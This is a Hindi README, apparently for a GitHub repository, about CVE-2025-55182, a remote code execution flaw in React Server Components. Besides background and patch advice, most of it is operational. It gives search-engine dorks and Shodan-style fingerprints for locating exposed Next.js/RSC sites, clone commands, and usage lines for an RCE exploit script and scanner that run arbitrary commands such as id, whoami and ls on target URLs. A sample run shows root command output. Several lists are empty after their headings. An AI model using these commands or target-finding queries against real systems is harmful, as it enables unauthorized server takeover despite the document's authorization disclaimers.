
कई पैकेजों में React Server Components (RSC) कार्यान्वयन को प्रभावित करने वाली एक गंभीर Remote Code Execution (RCE) भेद्यता, जिसमें शामिल हैं।
CVE-2025-55182 एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है जो कई पैकेजों में React सर्वर घटकों (RSC) के कार्यान्वयन को प्रभावित करती है, जिनमें शामिल हैं:
यह भेद्यता RSC द्वारा उपयोग किए जाने वाले आंतरिक Flight प्रोटोकॉल के माध्यम से भेजे गए पेलोड के असुरक्षित डी-सीरियलाइज़ेशन के कारण उत्पन्न होती है। जब कुछ अविश्वसनीय इनपुट HTTP अनुरोधों के माध्यम से React सर्वर घटकों में प्रवाहित होता है, तो सर्वर-साइड कोड निष्पादन ट्रिगर हो सकता है।
प्रभावित संस्करणों में शामिल हैं:
पैच किए गए संस्करणों में शामिल हैं:
React सर्वर घटक क्लाइंट-साइड अनुरोधों को स्वीकार करते हैं जिन्हें बैकएंड पर पार्स और डी-सीरियलाइज़ किया जाता है। यह भेद्यता आवक डेटा के डी-सीरियलाइज़ेशन के आसपास अपर्याप्त नियंत्रणों से उत्पन्न होती है, जिससे विशेष रूप से तैयार किए गए पेलोड को निष्पादन योग्य सर्वर-साइड घटकों के रूप में व्याख्यायित किया जा सकता है।
जब ऐसा होता है, तो सर्वर पर मनमाना JavaScript निष्पादन हो सकता है, जो होस्टिंग वातावरण और विशेषाधिकारों के आधार पर सर्वर के पूर्ण समझौते का कारण बन सकता है।
यदि इसका शोषण किया जाता है, तो एक हमलावर निम्न कार्य करने में सक्षम हो सकता है:
CVSS स्कोर: 10.0 – गंभीर (CRITICAL)
सत्यापित करें कि क्या एप्लिकेशन React सर्वर घटकों को उजागर करता है और क्या प्रभावित संस्करण उपयोग में हैं।
curl -I https://target.com/?__rsc=1
ये कीवर्ड यह पहचानने में मदद करते हैं कि कोई सार्वजनिक रूप से सुलभ रिपॉजिटरी या वेब एप्लिकेशन RSC घटकों का संदर्भ देती है या नहीं।
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"
केवल आपके संगठन के डोमेन के आंतरिक ऑडिट के लिए अभिप्रेत है।
एक्सपोज़्ड फ्रेमवर्क उपयोग की जांच करें, भेद्यता शोषण की नहीं।
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"
रक्षात्मक स्कैनिंग को स्वचालित करने के लिए, अपने स्वयं के इन्फ्रास्ट्रक्चर मूल्यांकन हेतु टेम्पलेट-आधारित डिटेक्शन लॉजिक क्लोन करें:
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.
CVE-2025-55182.py)पूर्ण-विशेषताओं वाला RCE एक्सप्लॉइट स्क्रिप्ट जो मनमाने कमांड निष्पादित करता है और आउटपुट प्राप्त करता है।
उपयोग:
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
chmod +x scanner.sh
# Scan with default command (id)
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d example.com -c "whoami"
# With full URL
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - लक्ष्य डोमेन/URL (आवश्यक)-c, --command - निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com
# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"
# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Bash
curl
openssl
रिपॉजिटरी के अंदर मौजूद टेम्पलेट निम्नलिखित के लिए अभिप्रेत हैं:
महत्वपूर्ण: ये टेम्पलेट केवल उन्हीं सिस्टम पर निष्पादित किए जाने चाहिए जिनके आप स्वामी हैं या जिनका मूल्यांकन करने के लिए आप अधिकृत हैं।
इस रिपॉजिटरी में शामिल Nuclei टेम्पलेट केवल निम्नलिखित के लिए अभिप्रेत हैं:
कृपया सुनिश्चित करें:
पैच किए गए रिलीज़ में से किसी एक में अपग्रेड करें:
सुरक्षा शोधकर्ता • साइबर सुरक्षा प्रशिक्षक • बग बाउंटी हंटर
आदर्श वाक्य: शून्य विश्वास, पूर्ण सुरक्षा 🚀
CVE-2025-55182 वर्तमान में React-आधारित इन्फ्रास्ट्रक्चर के लिए सबसे गंभीर खतरों में से एक है। तुच्छ शोषण वेक्टर और बिना प्रमाणीकरण वाली हमले की सतह के कारण, तुरंत पैचिंग की दृढ़ता से अनुशंसा की जाती है। प्रभावित RSC संस्करणों को चलाने वाले किसी भी संगठन को आपातकालीन प्राथमिकता पर विचार करना चाहिए।
यह रिपॉजिटरी और दस्तावेज़ीकरण आपके स्वामित्व वाली संपत्तियों के रक्षात्मक अनुसंधान और सुरक्षा सत्यापन के लिए हैं। किसी भी दुरुपयोग का परिणाम अवैध हो सकता है। कानूनों और संगठनात्मक नीति का अनुपालन करने की जिम्मेदारी आपकी है।
Cyber Leelawat द्वारा ❤️ के साथ निर्मित
शून्य विश्वास, पूर्ण सुरक्षा 🎯🔐